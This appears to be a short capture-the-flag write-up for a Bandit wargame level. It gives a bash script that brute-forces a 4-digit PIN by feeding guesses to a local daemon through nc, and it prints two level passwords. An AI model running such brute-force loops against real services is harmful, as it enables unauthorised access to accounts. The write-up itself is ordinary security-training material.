Level goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
The following is my script to perform this brute-forcing techqnies,
#!/bin/bash
pass24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
pin=0
while [ $pin -lt 10000 ]; do
echo “Attempting PIN: $pin”
attempt=”$(echo $pass24 $pin | nc localhost 30002)”
if ! [[ $attempt == *”Wrong!”* ]]; then
echo -ne “$attempt”
break
fi
((pin++))
done
The script will iterate through each possible PIN to perform brute forcing in identifying the secret pincode of bandit25.
The password to gain access to the next level is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG.